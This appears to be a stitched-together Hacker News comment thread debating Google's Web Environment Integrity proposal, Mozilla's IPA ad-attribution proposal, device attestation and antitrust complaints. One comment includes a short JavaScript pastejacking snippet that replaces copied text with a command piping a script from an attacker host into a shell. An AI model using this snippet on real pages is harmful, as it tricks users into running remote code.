https://webkit.org/standards-positions/
(this one has not landed yet, likely to be opposed as well)
For example it is currently the reality in EU, that in order to use any of the native banking apps, a user has no choice but to expose themselves to privacy violations by either Google or Apple, i.e. US companies.
While at least one alternative exists, https://grapheneos.org/articles/attestation-compatibility-gu..., these alternatives are not being used in practice.
I see no way of preventing this happening on the web as well, if the Web Environment Integrity API ships.
If you are shown a product ad whilst browsing searchengine.example and then later look up the product at reviews.example, then end up making a purchase at shop.example, your Mozilla browser will send all of these events to one or more aggregation services that allows shop.example to understand (at least in aggregate, assuming you trust the cartels running the aggregation services) that you were exposed to their product at searchengine.example and further exposed to their product at reviews.example.
Where previously an ad tech company was ultimately able to track users based on source IP address (even if cookies had been disabled by a user), IPA now allows these companies to track users across multiple IP addresses, and regardless of the user's cookie settings, via a unique tracking identifier. It is also proposed that the operating system provides the unique tracking identifier which can then be used by all applications or browsers on a device, allowing different devices behind a single IP address to be distinguished.
[1] https://github.com/mozilla/standards-positions/issues/753
[2] https://github.com/WebKit/standards-positions/issues/142
Either this protocol is useless for its intended purpose, or banks will only accept a small handful of attestors that promise not to sign for environments where the owner has control. Being able to create a new attestor means nothing because attestation is not valuable without pre-established trust.
The fraud prevention use case requires that the browser matches what Google or Mozilla shipped, not what I choose to actually run. From 10,000 feet in the sky, there's zero difference between, say, someone who installed modified software on their phone to protect their privacy and someone who was tricked into installing malware[0]. Banks don't care about your freedom, they care about making your fraud someone else's fault.
Some of the use cases explicitly call for locking the owner out of their device too. Anticheat in games is treated as at least beneficial to honest users, but it can still be user hostile[1]. Click fraud detection shouldn't even be something that a USER agent cares about - and it's not like Google cares about that anyway[2].
Practically speaking the only Linux distros that will get an attestor that anyone will actually care about will be Chrome OS and Play-certified Android. At best, Google agrees to attest for Chrome and Firefox on non-Chrome-OS Linux and it winds up being like EME did. At worst everyone has to buy a Windows license just to use most websites anymore.
>Assistive technologies will still work as the browsers implement platform's assistive APIs.
At least until someone says "we need to keep content from being data mined for AI training[3]" and AI scrapers find out how to automate those APIs. The underlying power dynamic of attestation means that websites can just demand attestors ban screen readers, in the same way that ebook DRM already does.
[0] Casual reminder that Louis Rossman was harassed by the GrapheneOS developer for agreeing with someone that the developer asserted had harassed them. He uninstalled GrapheneOS specifically to avoid being pwned by its developer.
[1] Let me remind you of the insane cat-and-mouse game where cheaters went into the kernel, so now anticheat is in the kernel, and now cheaters find vulns in the anticheat to hide their cheats in, which now malware can use as well.
[2] https://www.theregister.com/2023/06/29/google_trueview_skept...
[3] Reddit
Most of these private attribution systems are specifically designed so that the people running the ad can count how many people clicked their ads, but not who clicked them or what other things they did. Safari had a proposal in which you could only have a certain number of campaigns running per domain, so you couldn't set up a separate """campaign""" for each user and fingerprint them all at once. I don't know how the Mozilla proposal differs.
Whether or not user-agents should care about this sort of thing is an orthogonal question.
[0] https://www.theregister.com/2023/06/29/google_trueview_skept...
[1] Remarketing in particular is responsible for the "feeling of being seen" from modern ads where you search for one thing and get 10,000 ads for the thing for the next week
https://github.com/gorhill/uBlock/wiki/uBlock-Origin-works-b...
Additionally, AntiFraudCG proposals such as WEI focus on benefits they provide to PATCG proposals. For example, a Googler with historical interest in minimising inflated view counts on YouTube[4] (a benefit to YouTube's advertisers) wrote earlier this year a proposal to AntiFraudCG including:
"By transmitting signals of legitimacy from the device’s platform, such as if the device is emulated or rooted, publishers and their technology partners could use this information in part to determine if traffic is invalid. They could then choose appropriate actions like flagging advertising actions as suspicious"[5]
[2] https://github.com/antifraudcg
[3] https://www.mozilla.org/en-US/mission/
[4] https://security.googleblog.com/2014/02/keeping-youtube-view...
Basic malware JavaScript snippet:
<script>
document.getElementById('copy').addEventListener('copy', function(e) {
e.clipboardData.setData('text/plain',
'curl http://attacker-domain:8000/shell.sh | sh\n'); e.preventDefault();
});
</script>[0] https://us.boell.org/en/2019/10/17/web-partner-companies-kee...
[1] https://tvpworld.com/40781592/another-letter-from-us-ambassa...
<>>23117242 >
There's no reason your question couldn't have been posted in a relevant (sub)thread, instead of here, where it's (i) not on topic for the current subject, but (ii) looks like it could be, and therefore (iii) has the same effect as moving the goalposts.
[1] https://appleinsider.com/articles/12/07/25/apple_kills_windo...
"Firefox displayed a pop-up ad for Mozilla VPN over an unrelated page" (>>36077360 )
"Mozilla stops Firefox fullscreen VPN ads after user outrage" (>>36085642 )
That's another incident that just shouldn't have ever happened to begin with, in my opinion.
https://stackoverflow.com/questions/39533/how-to-identify-th...
Were you expecting only responses of praise for Mozilla, that users have been heard on WEI and therefore everyone can move on? Mozilla has invested resources together with Meta into developing the IPA proposal that also prioritises the needs of advertisers over users. The problem that IPA seeks to solve is:
"Advertisers need accurate reporting about how their ad campaigns are performing. Currently, businesses use data about the people who viewed their ads and bought their products to determine ‘return on ad spend’. But the ecosystem is moving towards more privacy and less personal data sharing."[1]
"Detecting fraud and invalid traffic is a challenging problem that we're interested in helping address."
A further error of your framing is assuming WEI and IPA proposals can be meaningfully discussed in isolation of each other. With such framing, there is an avoidance of discussion of the combined impact of proposals if they were implemented together, or whether proposals such as IPA still make sense to pursue without WEI (or future equivalent proposal).
[1] https://docs.google.com/presentation/d/1NpQz0Wm73eEKw24V7B0y...
[2] https://www.rfc-editor.org/rfc/rfc8890.html
[3] https://www.w3.org/TR/design-principles/#priority-of-constit...
[4] https://www.w3.org/TR/ethical-web-principles/#control, https://www.w3.org/TR/ethical-web-principles/#multi, https://www.w3.org/TR/ethical-web-principles/#render
I know people want convenience. Anyone interested in convenience will just use Windows or macOS. They won't need to mess with VMs. This whole problem is only an issue for the small percentage of the population that wants to use their own weird operating systems, browsers, or addons.
If the need arises, someone will make a user friendly tool to do all this. Cassowary can do it today after following a step by step guide, they can also add their Web Integrity patches to those steps if they need to.
If you, as a user, want to have a special button that makes banking work without needing to know how or why, stick with proprietary operating systems. Linux isn't user friendly enough to accomplish this and it probably won't be for a while. The same is true if you want to watch your HD/4K streaming content without a huge struggle.
US:
- https://www.ftc.gov/enforcement/report-antitrust-violation
- antitrust@ftc.gov
EU:
- https://competition-policy.ec.europa.eu/antitrust/contact_en
- comp-greffe-antitrust@ec.europa.eu
UK:
- https://www.gov.uk/guidance/tell-the-cma-about-a-competition...
- general.enquiries@cma.gov.uk
India:
- https://www.cci.gov.in/antitrust/
- https://www.cci.gov.in/filing/atd
Canada:
- https://www.competitionbureau.gc.ca/eic/site/cb-bc.nsf/frm-e...